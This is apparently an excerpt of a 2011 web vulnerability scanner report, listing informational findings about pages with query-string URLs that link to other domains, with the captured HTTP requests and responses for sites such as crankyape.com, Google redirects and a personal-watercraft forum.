P3p: policyref="/w3c/p3p.xml",CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo TELo OUR OTRi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV"
Cache-Control: max-age=0, proxy-revalidate, private
X-atg-version: ATGPlatform/2006.3p5,CAF/2006.3,ACO/2006.3 [ DASLicense/0 DPSLicense/0 DSSLicense/0 ]
Set-Cookie: JSESSIONID=WXEJ2N3KRNFIDB4U3SIR5VQ; domain=business.att.com; path=/
Set-Cookie: JROUTE=p1ba; domain=business.att.com; path=/
Set-Cookie: DYN_USER_ID=207579474; domain=business.att.com; path=/
Set-Cookie: DYN_USER_CONFIRM=609658d5a1ebcf5618d05b23302f38b7; domain=business.att.com; path=/
X-Cache: MISS from 12.120.78.32
Via: 1.1 12.120.78.32:80 (cache/2.6.2.2.16.ATT)
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equ
...[SNIP]...
</h1>
<script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...
</script>
<script src="http://www.google.com/jsapi?key=ABQIAAAA5tdpImBf4eDcDKbLmSjk5xTUkbc6-RyEmhXHNETmcLgMd9n64RTmPO4_ao4eAxL3FEA8IPnbDDDvHQ" type="text/javascript"></script>
...[SNIP]...
</a>
<a href="http://www.sbc.com/gen/privacy-policy?pid=2587">&copy; 2011 AT&amp;T Intellectual Property</a>
...[SNIP]...
<noscript><img height="1" width="1" src="http://view.atdmt.com/action/cntwir_ServiceFamilyOverview_1/v3/ato.001/[atc1.ProductSub-Category/atc2.threat-vulnerability-management/atc3.network-security]" /></noscript>
...[SNIP]...

23.58. https://www.crankyape.com/default.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.crankyape.com
Path:   /default.asp

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /default.asp?pg=DispSingleItem&ItemNumber=26361 HTTP/1.1
Host: www.crankyape.com
Connection: keep-alive
Referer: http://www.crankyape.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=29347566.1415346539.1304319195.1304319195.1304319195.1; __utmb=29347566; __utmc=29347566; __utmz=29347566.1304319195.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/5|utmcmd=referral; ASPSESSIONIDSARCDQAB=LKADMMGCJFEGEIFCGJNABOCD

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Mon, 02 May 2011 01:53:37 GMT
Content-Type: text/html
Expires: Sun, 01 May 2011 01:53:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 30879

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html>
<head>
<title>Crankyape.com Insurance total loss rvs, motorcycles, atvs, snowmobiles, boats, trucks, trailers.
...[SNIP]...
</table>

<script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

23.59. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /plugins/like.php?&width=400&height=80&layout=standard&show_faces=true&action=like&font=arial&colorscheme=light&href=http%3A%2F%2Fwww.bing.com%3Fssd%3D20110501_0700%26ssh%3D1121929261%26FORM%3DHPFBLK%26mkt%3Den-US%26 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.70.50
X-Cnection: close
Date: Sun, 01 May 2011 23:32:34 GMT
Content-Length: 8636

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yM/r/FGFAI5AC1WM.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yg/r/vnWtCAcBiXn.js"></script>
...[SNIP]...

23.60. http://www.google.com/url

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /url?sa=t&source=web&cd=2&ved=0CB4QFjAB&url=https%3A%2F%2Fwww.onlinemicrofiche.com%2Fxtremepowersports%2Fshoppingcart%2FCheckOut%2FViewcart.asp&ei=OhG-TbWpAY6ftweYn7S7BQ&usg=AFQjCNGvnR0gucACG5iXNsoiJjP3yTYNhw HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=LumMfILOIubaQ6V3uwnnVHHmx_iWhkqmohHaboUow34NxpZ86tcfWJvUvQuPDaP0OZyKgDOICC-8iGxYmEZ47u1HHIyvJoNYeQNCiphbG7hdYNAS6A3bBKjfIijcHZ_F

Response

HTTP/1.1 302 Found
Location: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CheckOut/Viewcart.asp
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 02 May 2011 02:04:50 GMT
Server: gws
Content-Length: 282
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CheckOut/Viewcart.asp">here</A>
...[SNIP]...

23.61. http://www.google.com/url

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /url?sa=t&source=web&cd=7&ved=0CEIQFjAG&url=http%3A%2F%2Fwww.seoq.com%2Fwebstatshq%2Fwww.onlinemicrofiche.com&ei=OhG-TbWpAY6ftweYn7S7BQ&usg=AFQjCNEGnqVPSypVD2ZgFZB-lziIemYxVA HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=LumMfILOIubaQ6V3uwnnVHHmx_iWhkqmohHaboUow34NxpZ86tcfWJvUvQuPDaP0OZyKgDOICC-8iGxYmEZ47u1HHIyvJoNYeQNCiphbG7hdYNAS6A3bBKjfIijcHZ_F

Response

HTTP/1.1 302 Found
Location: http://www.seoq.com/webstatshq/www.onlinemicrofiche.com
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 02 May 2011 02:05:03 GMT
Server: gws
Content-Length: 252
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.seoq.com/webstatshq/www.onlinemicrofiche.com">here</A>
...[SNIP]...

23.62. http://www.google.com/url

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /url?sa=t&source=web&cd=3&ved=0CCQQFjAC&url=http%3A%2F%2Fwww.hlsm.com%2F&ei=OhG-TbWpAY6ftweYn7S7BQ&usg=AFQjCNHePIAL4GdKxUsNHy8GmTvKxJDkXw HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=LumMfILOIubaQ6V3uwnnVHHmx_iWhkqmohHaboUow34NxpZ86tcfWJvUvQuPDaP0OZyKgDOICC-8iGxYmEZ47u1HHIyvJoNYeQNCiphbG7hdYNAS6A3bBKjfIijcHZ_F

Response

HTTP/1.1 302 Found
Location: http://www.hlsm.com/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 02 May 2011 02:04:52 GMT
Server: gws
Content-Length: 217
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.hlsm.com/">here</A>.
...[SNIP]...

23.63. http://www.google.com/url

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /url?sa=t&source=web&cd=6&ved=0CDQQFjAF&url=http%3A%2F%2Fwww.greenhulk.net%2Fforums%2Farchive%2Findex.php%2Ft-126285.html&ei=OhG-TbWpAY6ftweYn7S7BQ&usg=AFQjCNGfzGiacNnYa_pzX26LSRWsrMYtJg HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=LumMfILOIubaQ6V3uwnnVHHmx_iWhkqmohHaboUow34NxpZ86tcfWJvUvQuPDaP0OZyKgDOICC-8iGxYmEZ47u1HHIyvJoNYeQNCiphbG7hdYNAS6A3bBKjfIijcHZ_F

Response

HTTP/1.1 302 Found
Location: http://www.greenhulk.net/forums/archive/index.php/t-126285.html
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 02 May 2011 02:04:58 GMT
Server: gws
Content-Length: 260
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.greenhulk.net/forums/archive/index.php/t-126285.html">here</A>
...[SNIP]...

23.64. http://www.google.com/url

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /url?sa=t&source=web&cd=8&ved=0CEgQFjAH&url=http%3A%2F%2Fwebsiteprice.net%2Fresult%2F%3Fid%3D65934&ei=OhG-TbWpAY6ftweYn7S7BQ&usg=AFQjCNHIO48l3NhH3kxC5IKXlFbwtTGdDw HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=LumMfILOIubaQ6V3uwnnVHHmx_iWhkqmohHaboUow34NxpZ86tcfWJvUvQuPDaP0OZyKgDOICC-8iGxYmEZ47u1HHIyvJoNYeQNCiphbG7hdYNAS6A3bBKjfIijcHZ_F

Response

HTTP/1.1 302 Found
Location: http://websiteprice.net/result/?id=65934
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 02 May 2011 02:05:05 GMT
Server: gws
Content-Length: 237
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://websiteprice.net/result/?id=65934">here</A>
...[SNIP]...

23.65. http://www.google.com/url

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /url?sa=t&source=web&cd=4&ved=0CCcQFjAD&url=http%3A%2F%2Fwww.ronnies.com%2Fmicro.htm&ei=OhG-TbWpAY6ftweYn7S7BQ&usg=AFQjCNGQM5H2pASRtblCVHFOW4syZdI9Og HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=LumMfILOIubaQ6V3uwnnVHHmx_iWhkqmohHaboUow34NxpZ86tcfWJvUvQuPDaP0OZyKgDOICC-8iGxYmEZ47u1HHIyvJoNYeQNCiphbG7hdYNAS6A3bBKjfIijcHZ_F

Response

HTTP/1.1 302 Found
Location: http://www.ronnies.com/micro.htm
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 02 May 2011 02:04:53 GMT
Server: gws
Content-Length: 229
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.ronnies.com/micro.htm">here</A>
...[SNIP]...

23.66. http://www.google.com/url

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /url?sa=t&source=web&cd=1&ved=0CBgQFjAA&url=https%3A%2F%2Fwww.onlinemicrofiche.com%2FWPS%2Fshoppingcart%2Fcheckout%2FViewcart.asp%3Fexpand%3D1019&ei=OhG-TbWpAY6ftweYn7S7BQ&usg=AFQjCNG1VYlna-u1E1GJSAOhTiuuydh9jA HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=LumMfILOIubaQ6V3uwnnVHHmx_iWhkqmohHaboUow34NxpZ86tcfWJvUvQuPDaP0OZyKgDOICC-8iGxYmEZ47u1HHIyvJoNYeQNCiphbG7hdYNAS6A3bBKjfIijcHZ_F

Response

HTTP/1.1 302 Found
Location: https://www.onlinemicrofiche.com/WPS/shoppingcart/checkout/Viewcart.asp?expand=1019
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 02 May 2011 02:04:48 GMT
Server: gws
Content-Length: 280
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="https://www.onlinemicrofiche.com/WPS/shoppingcart/checkout/Viewcart.asp?expand=1019">here</A>
...[SNIP]...

23.67. http://www.google.com/url

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /url

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /url?sa=t&source=web&cd=5&ved=0CC4QFjAE&url=http%3A%2F%2Fbizinformation.co%2Fwww.onlinemicrofiche.com&ei=OhG-TbWpAY6ftweYn7S7BQ&usg=AFQjCNEc-tzrcYttnNN7062O5lPKoPU8QQ HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=LumMfILOIubaQ6V3uwnnVHHmx_iWhkqmohHaboUow34NxpZ86tcfWJvUvQuPDaP0OZyKgDOICC-8iGxYmEZ47u1HHIyvJoNYeQNCiphbG7hdYNAS6A3bBKjfIijcHZ_F

Response

HTTP/1.1 302 Found
Location: http://bizinformation.co/www.onlinemicrofiche.com
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 02 May 2011 02:04:56 GMT
Server: gws
Content-Length: 246
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://bizinformation.co/www.onlinemicrofiche.com">here</A>
...[SNIP]...

23.68. http://www.greenhulk.net/forums/login.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.greenhulk.net
Path:   /forums/login.php

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

POST /forums/login.php?do=login HTTP/1.1
Host: www.greenhulk.net
Proxy-Connection: keep-alive
Referer: http://www.greenhulk.net/forums/register.php
Cache-Control: max-age=0
Origin: http://www.greenhulk.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gh_sessionhash=95336a5715caddfe645c46b8976e18eb; gh_lastvisit=1304301796; __utmz=109700179.1304319910.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gh_lastactivity=0; __utma=109700179.1539471416.1304319910.1304319910.1304319910.1; __utmc=109700179; __utmb=109700179.2.10.1304319910
Content-Length: 222

vb_login_username=User+Name&vb_login_password_hint=Password&vb_login_password=&s=&securitytoken=guest&do=login&vb_login_md5password=d41d8cd98f00b204e9800998ecf8427e&vb_login_md5password_utf=d41d8cd98f
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:30:42 GMT
Server: Apache
Set-Cookie: gh_lastvisit=1304301796; expires=Tue, 01-May-2012 02:30:42 GMT; path=/; domain=.greenhulk.net
Set-Cookie: gh_lastactivity=0; expires=Tue, 01-May-2012 02:30:42 GMT; path=/; domain=.greenhulk.net
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Mon, 02 May 2011 02:30:42 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 27862

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en" id="vbulletin_
...[SNIP]...
<div style="float: left; width: 320px;"><a href='http://www.amsoil.com/redirect.cgi?zo=1499968&page=index'><img src='images/amsoil.gif' />
...[SNIP]...
<div style="float: left; width: 320px;"><a href='http://pwcperformance.com'><img src='images/performance.gif' />
...[SNIP]...
<div style="float: left; width: 320px;"><a href='http://partsfinder.onlinemicrofiche.com/4tec/partsfinder.htm'><img src='images/oe.gif' />
...[SNIP]...
</script><script type="text/javascript" src="//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>
...[SNIP]...
<!-- Do not remove this copyright notice -->
   Powered by <a href="http://www.vbulletin.com" id="vbulletinlink">vBulletin&trade;</a>
...[SNIP]...

23.69. http://www.greenhulk.net/forums/showthread.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.greenhulk.net
Path:   /forums/showthread.php

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /forums/showthread.php?126285-Rear-boarding-step HTTP/1.1
Host: www.greenhulk.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gh_sessionhash=95336a5715caddfe645c46b8976e18eb; gh_lastvisit=1304301796; gh_lastactivity=0

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:10:50 GMT
Server: Apache
Set-Cookie: gh_lastactivity=0; expires=Tue, 01-May-2012 02:10:50 GMT; path=/; domain=.greenhulk.net
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Expires: Mon, 02 May 2011 02:10:50 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 73170

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en" id="vbulletin_
...[SNIP]...
<div style="float: left; width: 320px;"><a href='http://www.amsoil.com/redirect.cgi?zo=1499968&page=index'><img src='images/amsoil.gif' />
...[SNIP]...
<div style="float: left; width: 320px;"><a href='http://pwcperformance.com'><img src='images/performance.gif' />
...[SNIP]...
<div style="float: left; width: 320px;"><a href='http://partsfinder.onlinemicrofiche.com/4tec/partsfinder.htm'><img src='images/oe.gif' />
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
<blockquote class="postcontent restore ">
                           <a href="http://www.aquaperformance.com/pwcpricelist.html#yamaha" target="_blank">http://www.aquaperformance.com/pwcpricelist.html#yamaha</a>
...[SNIP]...
<blockquote class="postcontent restore ">
                           Boarding Steps <img src="http://www.rivayamaha.com/RivaStore/images/boarding_step.gif" border="0" alt="" onload="NcodeImageResizer.createOn(this);" /> Provides a wide stepping surface for ease of boarding, especially in deep water. Made from 6016-T6 aircraft-quality aluminum. Features a foam-padded step for comfort. Retracts automatically after use. <a href="http://www.rivayamaha.com/RivaStore/product_detail.asp?Product=Boarding Step, YAM FX140/FX-HO &#96;03~07" target="_blank"><img src="http://www.rivayamaha.com/RivaStore/images/empty.gif" border="0" alt="" onload="NcodeImageResizer.createOn(this);" /></a>MWV-FSTEP-FX-06Boarding Step, YAM FX140/FX-HO `03~07$ 215.89 <a href="https://www.onlinemicrofiche.com/Riva/ShoppingCart/CheckOut/ViewCart.asp?Type=14&amp;ISBN=MWV-FSTEP-FX-06" target="_blank"><img src="http://www.rivayamaha.com/RivaStore/images/add_button.gif" border="0" alt="" onload="NcodeImageResizer.createOn(this);" /></a><img src="http://www.rivayamaha.com/nav_images/2x600_blue_rule.gif" border="0" alt="" onload="NcodeImageResizer.createOn(this);" /><a href="http://www.rivayamaha.com/RivaStore/product_detail.asp?Product=Boarding Step, YAM SUV" target="_blank"><img src="http://www.rivayamaha.com/RivaStore/images/empty.gif" border="0" alt="" onload="NcodeImageResizer.createOn(this);" /></a>MWV-FSTEP-SU-V1Boarding Step, YAM SUV$ 199.95 <a href="https://www.onlinemicrofiche.com/Riva/ShoppingCart/CheckOut/ViewCart.asp?Type=14&amp;ISBN=MWV-FSTEP-SU-V1" target="_blank"><img src="http://www.rivayamaha.com/RivaStore/images/add_button.gif" border="0" alt="" onload="NcodeImageResizer.createOn(this);" /></a><img src="http://www.rivayamaha.com/nav_images/2x600_blue_rule.gif" border="0" alt="" onload="NcodeImageResizer.createOn(this);" /><a href="http://www.rivayamaha.com/RivaStore/product_detail.asp?Product=Boarding Step, YAM XLL/XLT" target="_blank"><img src="http://www.rivayamaha.com/RivaStore/images/empty.gif" border="0" alt="" 
onload="NcodeImageResizer.createOn(this);" /></a>MWV-FSTEP-XL-LTBoarding Step, YAM XLL/XLT$ 199.95 <a href="https://www.onlinemicrofiche.com/Riva/ShoppingCart/CheckOut/ViewCart.asp?Type=14&amp;ISBN=MWV-FSTEP-XL-LT" target="_blank"><img src="http://www.rivayamaha.com/RivaStore/images/add_button.gif" border="0" alt="" onload="NcodeImageResizer.createOn(this);" /></a><img src="http://www.rivayamaha.com/nav_images/2x600_blue_rule.gif" border="0" alt="" onload="NcodeImageResizer.createOn(this);" /><a href="http://www.rivayamaha.com/RivaStore/product_detail.asp?Product=Boarding Step, YAM XL700/WaveVenture All" target="_blank"><img src="http://www.rivayamaha.com/RivaStore/images/empty.gif" border="0" alt="" onload="NcodeImageResizer.createOn(this);" /></a>MWV-FSTEP-X1-V1Boarding Step, YAM XL700/WaveVenture All$ 199.95 <a href="https://www.onlinemicrofiche.com/Riva/ShoppingCart/CheckOut/ViewCart.asp?Type=14&amp;ISBN=MWV-FSTEP-X1-V1" target="_blank"><img src="http://www.rivayamaha.com/RivaStore/images/add_button.gif" border="0" alt="" onload="NcodeImageResizer.createOn(this);" /></a><img src="http://www.rivayamaha.com/nav_images/2x600_blue_rule.gif" border="0" alt="" onload="NcodeImageResizer.createOn(this);" />
                       </blockquote>
...[SNIP]...
<br />
<a href="http://wcporting.com/" target="_blank">wcporting.com/</a>
...[SNIP]...
<div class="blockrow"><a href="http://www.4-tecperformance.com/">PWC Performance Store</a>
...[SNIP]...
<br />
<a href="http://www.4-tecperformance.com/index.php?main_page=products_new">New Products</a>
...[SNIP]...
<strong><a href="http://www.4-tecperformance.com/index.php?main_page=index&cPath=18">Sea Doo Parts</a>
...[SNIP]...
<br />
